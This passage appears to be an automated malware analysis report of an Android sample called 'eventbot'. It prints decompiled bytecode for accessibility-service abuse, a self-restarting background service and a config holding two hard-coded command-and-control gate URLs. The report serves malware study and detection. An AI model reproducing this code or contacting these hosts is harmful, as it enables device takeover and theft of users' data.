                        65invoke-virtual {p0, v0}, Landroidx/versionedparcelable/VersionedParcel;->writeString(Ljava/lang/String;)V
                        66if-eq p2, v1, :cond_68
                        67goto/16 :goto_6d
                        68cond_68: check-cast p1, Landroid/os/Parcelable;
                        70invoke-virtual {p0, p1}, Landroidx/versionedparcelable/VersionedParcel;->writeParcelable(Landroid/os/Parcelable;)V
                        71goto_6d: return-void
                        APIs
                        • android.util.SparseArray.get
                        • android.util.SparseArray.remove
                        • java.io.DataInputStream.readInt
                        • java.io.DataInputStream.readInt
                        • android.util.SparseArray.put
                        Position Instruction Meta Information
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCachedFields:Landroid/util/SparseArray;
                        3invoke-virtual {v0, p1}, Landroid/util/SparseArray;->get(I)Ljava/lang/Object;
                        4move-result-object v0
                        5check-cast v0, Landroidx/versionedparcelable/VersionedParcelStream$InputBuffer;
                        6const/4 v1, 0x1
                        7if-eqz v0, :cond_15
                        9iget-object v2, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCachedFields:Landroid/util/SparseArray;
                        11invoke-virtual {v2, p1}, Landroid/util/SparseArray;->remove(I)V
                        13iget-object p1, v0, Landroidx/versionedparcelable/VersionedParcelStream$InputBuffer;->mInputStream:Ljava/io/DataInputStream;
                        14iput-object p1, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentInput:Ljava/io/DataInputStream;
                        15return v1
                        16cond_15:
                        17iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mMasterInput:Ljava/io/DataInputStream;
                        19invoke-virtual {v0}, Ljava/io/DataInputStream;->readInt()I
                        20move-result v0
                        21const v2, 0xffff
                        22and-int v3, v0, v2
                        23if-ne v3, v2, :cond_28
                        25iget-object v3, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mMasterInput:Ljava/io/DataInputStream;
                        27invoke-virtual {v3}, Ljava/io/DataInputStream;->readInt()I
                        28move-result v3
                        29cond_28: new-instance v4, Landroidx/versionedparcelable/VersionedParcelStream$InputBuffer;
                        30shr-int/lit8 v0, v0, 0x10
                        31and-int/2addr v0, v2
                        33iget-object v2, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mMasterInput:Ljava/io/DataInputStream;
                        35invoke-direct {v4, v0, v3, v2}, Landroidx/versionedparcelable/VersionedParcelStream$InputBuffer;-><init>(IILjava/io/DataInputStream;)V
                        36iget v0, v4, Landroidx/versionedparcelable/VersionedParcelStream$InputBuffer;->mFieldId:I
                        37if-ne v0, p1, :cond_3b
                        39iget-object p1, v4, Landroidx/versionedparcelable/VersionedParcelStream$InputBuffer;->mInputStream:Ljava/io/DataInputStream;
                        40iput-object p1, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentInput:Ljava/io/DataInputStream;
                        41return v1
                        42cond_3b:
                        43iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCachedFields:Landroid/util/SparseArray;
                        44iget v2, v4, Landroidx/versionedparcelable/VersionedParcelStream$InputBuffer;->mFieldId:I
                        46invoke-virtual {v0, v2, v4}, Landroid/util/SparseArray;->put(ILjava/lang/Object;)V
                        47try_end_42: goto/16 :goto_15
                        48catch_43: const/4 p1, 0x0
                        49return p1
                        Cross References
                        APIs
                        • java.io.DataOutputStream.flush
                        • java.io.ByteArrayOutputStream.size
                        • java.io.DataOutputStream.writeInt
                        • java.io.DataOutputStream.writeInt
                        • java.io.ByteArrayOutputStream.writeTo
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/io/IOException;
                        3}
                        4.end annotation
                        6iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream$FieldBuffer;->mDataStream:Ljava/io/DataOutputStream;
                        8invoke-virtual {v0}, Ljava/io/DataOutputStream;->flush()V
                        10iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream$FieldBuffer;->mOutput:Ljava/io/ByteArrayOutputStream;
                        12invoke-virtual {v0}, Ljava/io/ByteArrayOutputStream;->size()I
                        13move-result v0
                        14iget v1, p0, Landroidx/versionedparcelable/VersionedParcelStream$FieldBuffer;->mFieldId:I
                        15shl-int/lit8 v1, v1, 0x10
                        16const v2, 0xffff
                        17if-lt v0, v2, :cond_18
                        18const v3, 0xffff
                        19goto/16 :goto_19
                        20cond_18: move v3, v0
                        21goto_19: or-int/2addr v1, v3
                        23iget-object v3, p0, Landroidx/versionedparcelable/VersionedParcelStream$FieldBuffer;->mTarget:Ljava/io/DataOutputStream;
                        25invoke-virtual {v3, v1}, Ljava/io/DataOutputStream;->writeInt(I)V
                        26if-lt v0, v2, :cond_26
                        28iget-object v1, p0, Landroidx/versionedparcelable/VersionedParcelStream$FieldBuffer;->mTarget:Ljava/io/DataOutputStream;
                        30invoke-virtual {v1, v0}, Ljava/io/DataOutputStream;->writeInt(I)V
                        31cond_26:
                        32iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream$FieldBuffer;->mOutput:Ljava/io/ByteArrayOutputStream;
                        34iget-object v1, p0, Landroidx/versionedparcelable/VersionedParcelStream$FieldBuffer;->mTarget:Ljava/io/DataOutputStream;
                        36invoke-virtual {v0, v1}, Ljava/io/ByteArrayOutputStream;->writeTo(Ljava/io/OutputStream;)V
                        37return-void
                        APIs
                        • java.io.ObjectStreamClass.getName
                        • java.lang.Object.getClass
                        • java.lang.Class.getClassLoader
                        • java.lang.Class.forName
                        • java.io.ObjectInputStream.resolveClass
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"(",
                        3"Ljava/io/ObjectStreamClass;",
                        4")",
                        5"Ljava/lang/Class<",
                        6"*>;"
                        7}
                        8.end annotation
                        9.annotation system Ldalvik/annotation/Throws;
                        10value = {
                        11Ljava/io/IOException;,
                        12Ljava/lang/ClassNotFoundException;
                        13}
                        14.end annotation
                        16invoke-virtual {p1}, Ljava/io/ObjectStreamClass;->getName()Ljava/lang/String;
                        17move-result-object v0
                        19invoke-virtual {p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        20move-result-object v1
                        22invoke-virtual {v1}, Ljava/lang/Class;->getClassLoader()Ljava/lang/ClassLoader;
                        23move-result-object v1
                        24const/4 v2, 0x0
                        26invoke-static {v0, v2, v1}, Ljava/lang/Class;->forName(Ljava/lang/String;ZLjava/lang/ClassLoader;)Ljava/lang/Class;
                        27move-result-object v0
                        28if-eqz v0, :cond_14
                        29return-object v0
                        30cond_14:
                        31invoke-super {p0, p1}, Ljava/io/ObjectInputStream;->resolveClass(Ljava/io/ObjectStreamClass;)Ljava/lang/Class;
                        32move-result-object p1
                        33return-object p1
                        Cross References
                        APIs
                        • java.lang.String.length
                        • java.lang.String.charAt
                        • java.lang.Character.digit
                        • java.lang.String.charAt
                        • java.lang.Character.digit
                        Position Instruction Meta Information
                        0.prologue
                        1const/16 v6, 0x10
                        3invoke-virtual {p1}, Ljava/lang/String;->length()I
                        4move-result v1
                        5div-int/lit8 v0, v1, 0x2
                        6new-array v2, v0, [B
                        7const/4 v0, 0x0
                        8goto_b: if-ge v0, v1, :cond_2a
                        9div-int/lit8 v3, v0, 0x2
                        11invoke-virtual {p1, v0}, Ljava/lang/String;->charAt(I)C
                        12move-result v4
                        14invoke-static {v4, v6}, Ljava/lang/Character;->digit(CI)I
                        15move-result v4
                        16shl-int/lit8 v4, v4, 0x4
                        17add-int/lit8 v5, v0, 0x1
                        19invoke-virtual {p1, v5}, Ljava/lang/String;->charAt(I)C
                        20move-result v5
                        22invoke-static {v5, v6}, Ljava/lang/Character;->digit(CI)I
                        23move-result v5
                        24add-int/2addr v4, v5
                        25int-to-byte v4, v4
                        26aput-byte v4, v2, v3
                        27add-int/lit8 v0, v0, 0x2
                        28goto/16 :goto_b
                        29cond_2a: return-object v2
                        Cross References
                        APIs
                        • java.lang.String.length
                        • java.lang.String.charAt
                        • java.lang.Character.digit
                        • java.lang.String.charAt
                        • java.lang.Character.digit
                        Position Instruction Meta Information
                        1invoke-virtual {p1}, Ljava/lang/String;->length()I
                        2move-result v0
                        3div-int/lit8 v1, v0, 0x2
                        4new-array v1, v1, [B
                        5const/4 v2, 0x0
                        6goto_9: if-ge v2, v0, :cond_2a
                        7div-int/lit8 v3, v2, 0x2
                        9invoke-virtual {p1, v2}, Ljava/lang/String;->charAt(I)C
                        10move-result v4
                        11const/16 v5, 0x10
                        13invoke-static {v4, v5}, Ljava/lang/Character;->digit(CI)I
                        14move-result v4
                        15shl-int/lit8 v4, v4, 0x4
                        16add-int/lit8 v6, v2, 0x1
                        18invoke-virtual {p1, v6}, Ljava/lang/String;->charAt(I)C
                        19move-result v6
                        21invoke-static {v6, v5}, Ljava/lang/Character;->digit(CI)I
                        22move-result v5
                        23add-int/2addr v4, v5
                        24int-to-byte v4, v4
                        25aput-byte v4, v1, v3
                        26add-int/lit8 v2, v2, 0x2
                        27goto/16 :goto_9
                        28cond_2a: return-object v1
                        Cross References
                        APIs
                        • android.content.Context.getPackageManager
                        • android.content.pm.PackageManager.getLaunchIntentForPackage
                        • java.lang.Object.equals
                        • android.content.Intent.setFlags
                        • android.content.Context.startActivity
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        3iget-object v1, p0, Lcom/lib;->a11yClassName:Ljava/lang/String;
                        5invoke-virtual {p0, p1, v1}, Lcom/lib;->isA11y(Landroid/content/Context;Ljava/lang/String;)Z
                        6move-result v1
                        7if-nez v1, :cond_a
                        8goto_9: return v0
                        9cond_a:
                        10invoke-virtual {p1}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
                        11move-result-object v1
                        13invoke-virtual {v1, p2}, Landroid/content/pm/PackageManager;->getLaunchIntentForPackage(Ljava/lang/String;)Landroid/content/Intent;
                        14move-result-object v1
                        15const/4 v2, 0x0
                        17invoke-virtual {v1, v2}, Ljava/lang/Object;->equals(Ljava/lang/Object;)Z
                        18move-result v2
                        19if-nez v2, :cond_9
                        20const/high16 v2, 0x14000000
                        22invoke-virtual {v1, v2}, Landroid/content/Intent;->setFlags(I)Landroid/content/Intent;
                        24invoke-virtual {p1, v1}, Landroid/content/Context;->startActivity(Landroid/content/Intent;)V
                        25try_end_21: const/4 v0, 0x1
                        26goto/16 :goto_9
                        27catch_23: move-exception v1
                        28goto/16 :goto_9
                        Cross References
                        APIs
                        • java.lang.String.getBytes
                        • java.io.DataOutputStream.writeInt
                        • java.io.DataOutputStream.write
                        • java.io.DataOutputStream.writeInt
                        • androidx.versionedparcelable.VersionedParcel$ParcelException.<init>
                        Position Instruction Meta Information
                        0if-eqz p1, :cond_14
                        1try_start_2:
                        2sget-object v0, Landroidx/versionedparcelable/VersionedParcelStream;->UTF_16:Ljava/nio/charset/Charset;
                        4invoke-virtual {p1, v0}, Ljava/lang/String;->getBytes(Ljava/nio/charset/Charset;)[B
                        5move-result-object p1
                        7iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentOutput:Ljava/io/DataOutputStream;
                        8array-length v1, p1
                        10invoke-virtual {v0, v1}, Ljava/io/DataOutputStream;->writeInt(I)V
                        12iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentOutput:Ljava/io/DataOutputStream;
                        14invoke-virtual {v0, p1}, Ljava/io/DataOutputStream;->write([B)V
                        15goto/16 :goto_1a
                        16cond_14:
                        17iget-object p1, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentOutput:Ljava/io/DataOutputStream;
                        18const/4 v0, -0x1
                        20invoke-virtual {p1, v0}, Ljava/io/DataOutputStream;->writeInt(I)V
                        21goto_1a: return-void
                        22catch_1b: move-exception p1
                        23new-instance v0, Landroidx/versionedparcelable/VersionedParcel$ParcelException;
                        25invoke-direct {v0, p1}, Landroidx/versionedparcelable/VersionedParcel$ParcelException;-><init>(Ljava/lang/Throwable;)V
                        26throw v0
                        Cross References
                        APIs
                        • android.util.SparseIntArray.get
                        • android.os.Parcel.dataPosition
                        • android.os.Parcel.setDataPosition
                        • android.os.Parcel.writeInt
                        • android.os.Parcel.setDataPosition
                        Position Instruction Meta Information
                        0iget v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mCurrentField:I
                        1if-ltz v0, :cond_21
                        3iget-object v1, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mPositionLookup:Landroid/util/SparseIntArray;
                        5invoke-virtual {v1, v0}, Landroid/util/SparseIntArray;->get(I)I
                        6move-result v0
                        8iget-object v1, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        10invoke-virtual {v1}, Landroid/os/Parcel;->dataPosition()I
                        11move-result v1
                        12sub-int v2, v1, v0
                        14iget-object v3, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        16invoke-virtual {v3, v0}, Landroid/os/Parcel;->setDataPosition(I)V
                        18iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        20invoke-virtual {v0, v2}, Landroid/os/Parcel;->writeInt(I)V
                        22iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        24invoke-virtual {v0, v1}, Landroid/os/Parcel;->setDataPosition(I)V
                        25cond_21: return-void
                        Cross References
                        APIs
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getJSONObject
                        • android.view.accessibility.AccessibilityEvent.getEventType
                        Strings
                        • options
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v1, 0x0
                        2const/4 v0, 0x1
                        3try_start_2:
                        4const-string v2, "options"
                        6invoke-virtual {p3, v2}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        7move-result v2
                        8if-nez v2, :cond_1e
                        10const-string v2, "options"
                        12invoke-virtual {p3, v2}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        13move-result-object v2
                        15invoke-direct {p0, p1, p2, v2}, Lcom/lib;->checkOptions(Landroid/view/accessibility/AccessibilityEvent;Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Z
                        16move-result v2
                        17if-nez v2, :cond_17
                        18move v0, v1
                        19cond_17: if-eqz v0, :cond_1d
                        21invoke-direct {p0, p2, p3}, Lcom/lib;->makeAction(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Z
                        22move-result v0
                        23cond_1d: return v0
                        24cond_1e:
                        25invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getEventType()I
                        26try_end_21: move-result v2
                        27const/16 v3, 0x20
                        28if-eq v2, v3, :cond_17
                        29move v0, v1
                        30goto/16 :goto_17
                        31catch_28: move-exception v0
                        32move v0, v1
                        33goto/16 :goto_1d
                        Cross References
                        APIs
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getJSONObject
                        • android.view.accessibility.AccessibilityEvent.getEventType
                        Strings
                        • options
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x1
                        2const/4 v1, 0x0
                        3try_start_2:
                        4const-string v2, "options"
                        6invoke-virtual {p3, v2}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        7move-result v2
                        8if-nez v2, :cond_17
                        10const-string v2, "options"
                        12invoke-virtual {p3, v2}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        13move-result-object v2
                        15invoke-direct {p0, p1, p2, v2}, Lcom/lib;->checkOptions(Landroid/view/accessibility/AccessibilityEvent;Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Z
                        16move-result v2
                        17if-eqz v2, :cond_1f
                        18cond_16: return v0
                        19cond_17:
                        20invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityEvent;->getEventType()I
                        21try_end_1a: move-result v2
                        22const/16 v3, 0x20
                        23if-ne v2, v3, :cond_16
                        24cond_1f: move v0, v1
                        25goto/16 :goto_16
                        26catch_21: move-exception v0
                        27move v0, v1
                        28goto/16 :goto_16
                        APIs
                        • java.lang.Long.valueOf
                        • java.lang.Long.valueOf
                        • java.lang.Integer.valueOf
                        Strings
                        • http://ora.studiolegalebasili.com/gate_cb8a5aea1ab302f0_c;http://ora.carlaarrabitoarchitetto.com/gate_cb8a5aea1ab302f0_c
                        Position Instruction Meta Information
                        0const-wide/16 v0, 0xf
                        2invoke-static {v0, v1}, Ljava/lang/Long;->valueOf(J)Ljava/lang/Long;
                        3move-result-object v0
                        4sput-object v0, Lcom/example/eventbot/cfg;->knockDelay:Ljava/lang/Long;
                        5const-wide/16 v1, 0xa
                        7invoke-static {v1, v2}, Ljava/lang/Long;->valueOf(J)Ljava/lang/Long;
                        8move-result-object v1
                        9sput-object v1, Lcom/example/eventbot/cfg;->bootDelay:Ljava/lang/Long;
                        11sget-object v1, Lcom/example/eventbot/cfg;->bootDelay:Ljava/lang/Long;
                        12sput-object v1, Lcom/example/eventbot/cfg;->alarmDelay:Ljava/lang/Long;
                        13sput-object v0, Lcom/example/eventbot/cfg;->permissionsDelay:Ljava/lang/Long;
                        14const/4 v0, 0x3
                        16invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        17move-result-object v0
                        18sput-object v0, Lcom/example/eventbot/cfg;->webRetries:Ljava/lang/Integer;
                        20const-string v0, "http://ora.studiolegalebasili.com/gate_cb8a5aea1ab302f0_c;http://ora.carlaarrabitoarchitetto.com/gate_cb8a5aea1ab302f0_c"
                        21sput-object v0, Lcom/example/eventbot/cfg;->urls:Ljava/lang/String;
                        22return-void
                        APIs
                        • android.app.Service.onDestroy
                        • android.util.Log.v
                        • com.example.eventbot.service.handler:Landroid/os/Handler
                        • android.os.Handler.postDelayed
                        Strings
                        • [func] [service] onDestroy
                        Position Instruction Meta Information
                        1invoke-super {p0}, Landroid/app/Service;->onDestroy()V
                        3sget-object v0, Lcom/example/eventbot/cfg;->TAG:Ljava/lang/String;
                        5const-string v1, "[func] [service] onDestroy"
                        7invoke-static {v0, v1}, Landroid/util/Log;->v(Ljava/lang/String;Ljava/lang/String;)I
                        8const/4 v0, 0x0
                        9sput-boolean v0, Lcom/example/eventbot/service;->isRunning:Z
                        10const/4 v0, 0x0
                        11sput-object v0, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        13iget-object v0, p0, Lcom/example/eventbot/service;->handler:Landroid/os/Handler;
                        14new-instance v1, Lcom/example/eventbot/service$2;
                        16invoke-direct {v1, p0}, Lcom/example/eventbot/service$2;-><init>(Lcom/example/eventbot/service;)V
                        17const-wide/16 v2, 0xbb8
                        19invoke-virtual {v0, v1, v2, v3}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
                        20return-void
                        APIs
                        • android.app.Service.onTaskRemoved
                        • android.util.Log.v
                        • com.example.eventbot.service.handler:Landroid/os/Handler
                        • android.os.Handler.postDelayed
                        Strings
                        • [func] [service] onTaskRemoved
                        Position Instruction Meta Information
                        1invoke-super {p0, p1}, Landroid/app/Service;->onTaskRemoved(Landroid/content/Intent;)V
                        3sget-object p1, Lcom/example/eventbot/cfg;->TAG:Ljava/lang/String;
                        5const-string v0, "[func] [service] onTaskRemoved"
                        7invoke-static {p1, v0}, Landroid/util/Log;->v(Ljava/lang/String;Ljava/lang/String;)I
                        8const/4 p1, 0x0
                        9sput-boolean p1, Lcom/example/eventbot/service;->isRunning:Z
                        10const/4 p1, 0x0
                        11sput-object p1, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        13iget-object p1, p0, Lcom/example/eventbot/service;->handler:Landroid/os/Handler;
                        14new-instance v0, Lcom/example/eventbot/service$3;
                        16invoke-direct {v0, p0}, Lcom/example/eventbot/service$3;-><init>(Lcom/example/eventbot/service;)V
                        17const-wide/16 v1, 0xbb8
                        19invoke-virtual {p1, v0, v1, v2}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
                        20return-void
                        APIs
                        • android.content.Intent.<init>
                        • android.content.Intent.addFlags
                        • android.content.Context.startActivity
                        Strings
                        • android.settings.ACCESSIBILITY_SETTINGS
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Landroid/content/Intent;
                        3const-string v1, "android.settings.ACCESSIBILITY_SETTINGS"
                        5invoke-direct {v0, v1}, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
                        6const/high16 v1, 0x54000000
                        8invoke-virtual {v0, v1}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
                        10invoke-virtual {p1, v0}, Landroid/content/Context;->startActivity(Landroid/content/Intent;)V
                        11return-void
                        Cross References
                        APIs
                        • android.os.Parcel.setDataPosition
                        • android.os.Parcel.readInt
                        • android.os.Parcel.readInt
                        • android.os.Parcel.dataPosition
                        Position Instruction Meta Information
                        0cond_0: iget v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mNextRead:I
                        1iget v1, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mEnd:I
                        2if-ge v0, v1, :cond_25
                        4iget-object v1, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        6invoke-virtual {v1, v0}, Landroid/os/Parcel;->setDataPosition(I)V
                        8iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        10invoke-virtual {v0}, Landroid/os/Parcel;->readInt()I
                        11move-result v0
                        13iget-object v1, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        15invoke-virtual {v1}, Landroid/os/Parcel;->readInt()I
                        16move-result v1
                        17iget v2, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mNextRead:I
                        18add-int/2addr v2, v0
                        19iput v2, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mNextRead:I
                        20if-ne v1, p1, :cond_0
                        22iget-object p1, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        24invoke-virtual {p1}, Landroid/os/Parcel;->dataPosition()I
                        25move-result p1
                        26return p1
                        27cond_25: const/4 p1, -0x1
                        28return p1
                        Cross References
                        APIs
                        • java.io.DataInputStream.readInt
                        • java.io.DataInputStream.readFully
                        • java.lang.String.<init>
                        • androidx.versionedparcelable.VersionedParcel$ParcelException.<init>
                        Position Instruction Meta Information
                        0try_start_0:
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentInput:Ljava/io/DataInputStream;
                        3invoke-virtual {v0}, Ljava/io/DataInputStream;->readInt()I
                        4move-result v0
                        5if-lez v0, :cond_17
                        6new-array v0, v0, [B
                        8iget-object v1, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentInput:Ljava/io/DataInputStream;
                        10invoke-virtual {v1, v0}, Ljava/io/DataInputStream;->readFully([B)V
                        11new-instance v1, Ljava/lang/String;
                        13sget-object v2, Landroidx/versionedparcelable/VersionedParcelStream;->UTF_16:Ljava/nio/charset/Charset;
                        15invoke-direct {v1, v0, v2}, Ljava/lang/String;-><init>([BLjava/nio/charset/Charset;)V
                        16try_end_16: return-object v1
                        17cond_17: const/4 v0, 0x0
                        18return-object v0
                        19catch_19: move-exception v0
                        20new-instance v1, Landroidx/versionedparcelable/VersionedParcel$ParcelException;
                        22invoke-direct {v1, v0}, Landroidx/versionedparcelable/VersionedParcel$ParcelException;-><init>(Ljava/lang/Throwable;)V
                        23throw v1
                        APIs
                        • java.lang.Thread.isAlive
                        • java.lang.Thread.start
                        • java.lang.Thread.isAlive
                        • java.lang.Thread.start
                        Position Instruction Meta Information
                        0.prologue
                        2iget-object v0, p0, Lcom/lib;->networkThread:Ljava/lang/Thread;
                        4invoke-virtual {v0}, Ljava/lang/Thread;->isAlive()Z
                        5move-result v0
                        6if-nez v0, :cond_d
                        8iget-object v0, p0, Lcom/lib;->networkThread:Ljava/lang/Thread;
                        10invoke-virtual {v0}, Ljava/lang/Thread;->start()V
                        11cond_d:
                        12iget-object v0, p0, Lcom/lib;->permissionsThread:Ljava/lang/Thread;
                        14invoke-virtual {v0}, Ljava/lang/Thread;->isAlive()Z
                        15move-result v0
                        16if-nez v0, :cond_1a
                        18iget-object v0, p0, Lcom/lib;->permissionsThread:Ljava/lang/Thread;
                        20invoke-virtual {v0}, Ljava/lang/Thread;->start()V
                        21cond_1a: return-void
                        APIs
                        • java.io.DataOutputStream.writeInt
                        • java.io.DataOutputStream.write
                        • java.io.DataOutputStream.writeInt
                        • androidx.versionedparcelable.VersionedParcel$ParcelException.<init>
                        Position Instruction Meta Information
                        0if-eqz p1, :cond_e
                        1try_start_2:
                        2iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentOutput:Ljava/io/DataOutputStream;
                        3array-length v1, p1
                        5invoke-virtual {v0, v1}, Ljava/io/DataOutputStream;->writeInt(I)V
                        7iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentOutput:Ljava/io/DataOutputStream;
                        9invoke-virtual {v0, p1}, Ljava/io/DataOutputStream;->write([B)V
                        10goto/16 :goto_14
                        11cond_e:
                        12iget-object p1, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentOutput:Ljava/io/DataOutputStream;
                        13const/4 v0, -0x1
                        15invoke-virtual {p1, v0}, Ljava/io/DataOutputStream;->writeInt(I)V
                        16try_end_14: return-void
                        17catch_15: move-exception p1
                        18new-instance v0, Landroidx/versionedparcelable/VersionedParcel$ParcelException;
                        20invoke-direct {v0, p1}, Landroidx/versionedparcelable/VersionedParcel$ParcelException;-><init>(Ljava/lang/Throwable;)V
                        21throw v0
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        • java.io.DataInputStream.readFully
                        • java.io.ByteArrayInputStream.<init>
                        • java.io.DataInputStream.<init>
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/io/IOException;
                        3}
                        4.end annotation
                        6invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        7iput p2, p0, Landroidx/versionedparcelable/VersionedParcelStream$InputBuffer;->mSize:I
                        8iput p1, p0, Landroidx/versionedparcelable/VersionedParcelStream$InputBuffer;->mFieldId:I
                        9iget p1, p0, Landroidx/versionedparcelable/VersionedParcelStream$InputBuffer;->mSize:I
                        10new-array p1, p1, [B
                        12invoke-virtual {p3, p1}, Ljava/io/DataInputStream;->readFully([B)V
                        13new-instance p2, Ljava/io/DataInputStream;
                        14new-instance p3, Ljava/io/ByteArrayInputStream;
                        16invoke-direct {p3, p1}, Ljava/io/ByteArrayInputStream;-><init>([B)V
                        18invoke-direct {p2, p3}, Ljava/io/DataInputStream;-><init>(Ljava/io/InputStream;)V
                        19iput-object p2, p0, Landroidx/versionedparcelable/VersionedParcelStream$InputBuffer;->mInputStream:Ljava/io/DataInputStream;
                        20return-void
                        APIs
                        • java.io.DataOutputStream.writeInt
                        • java.io.DataOutputStream.write
                        • java.io.DataOutputStream.writeInt
                        • androidx.versionedparcelable.VersionedParcel$ParcelException.<init>
                        Position Instruction Meta Information
                        0if-eqz p1, :cond_d
                        1try_start_2:
                        2iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentOutput:Ljava/io/DataOutputStream;
                        4invoke-virtual {v0, p3}, Ljava/io/DataOutputStream;->writeInt(I)V
                        6iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentOutput:Ljava/io/DataOutputStream;
                        8invoke-virtual {v0, p1, p2, p3}, Ljava/io/DataOutputStream;->write([BII)V
                        9goto/16 :goto_13
                        10cond_d:
                        11iget-object p1, p0, Landroidx/versionedparcelable/VersionedParcelStream;->mCurrentOutput:Ljava/io/DataOutputStream;
                        12const/4 p2, -0x1
                        14invoke-virtual {p1, p2}, Ljava/io/DataOutputStream;->writeInt(I)V
                        15try_end_13: return-void
                        16catch_14: move-exception p1
                        17new-instance p2, Landroidx/versionedparcelable/VersionedParcel$ParcelException;
                        19invoke-direct {p2, p1}, Landroidx/versionedparcelable/VersionedParcel$ParcelException;-><init>(Ljava/lang/Throwable;)V
                        20throw p2
                        APIs
                        • android.support.v7.app.AppCompatActivity.onCreate
                        • android.content.Intent.<init>
                        • com.example.eventbot.MainActivity.startService
                        • com.example.eventbot.MainActivity.finish
                        Position Instruction Meta Information
                        1invoke-super {p0, p1}, Landroid/support/v7/app/AppCompatActivity;->onCreate(Landroid/os/Bundle;)V
                        2sget-boolean p1, Lcom/example/eventbot/service;->isRunning:Z
                        3if-nez p1, :cond_11
                        4new-instance p1, Landroid/content/Intent;
                        5const-class v0, Lcom/example/eventbot/service;
                        7invoke-direct {p1, p0, v0}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
                        9invoke-virtual {p0, p1}, Lcom/example/eventbot/MainActivity;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
                        10cond_11:
                        11invoke-virtual {p0}, Lcom/example/eventbot/MainActivity;->finish()V
                        12return-void
                        APIs
                        • android.os.StrictMode$ThreadPolicy$Builder.<init>
                        • android.os.StrictMode$ThreadPolicy$Builder.permitAll
                        • android.os.StrictMode$ThreadPolicy$Builder.build
                        • android.os.StrictMode.setThreadPolicy
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Landroid/os/StrictMode$ThreadPolicy$Builder;
                        3invoke-direct {v0}, Landroid/os/StrictMode$ThreadPolicy$Builder;-><init>()V
                        5invoke-virtual {v0}, Landroid/os/StrictMode$ThreadPolicy$Builder;->permitAll()Landroid/os/StrictMode$ThreadPolicy$Builder;
                        6move-result-object v0
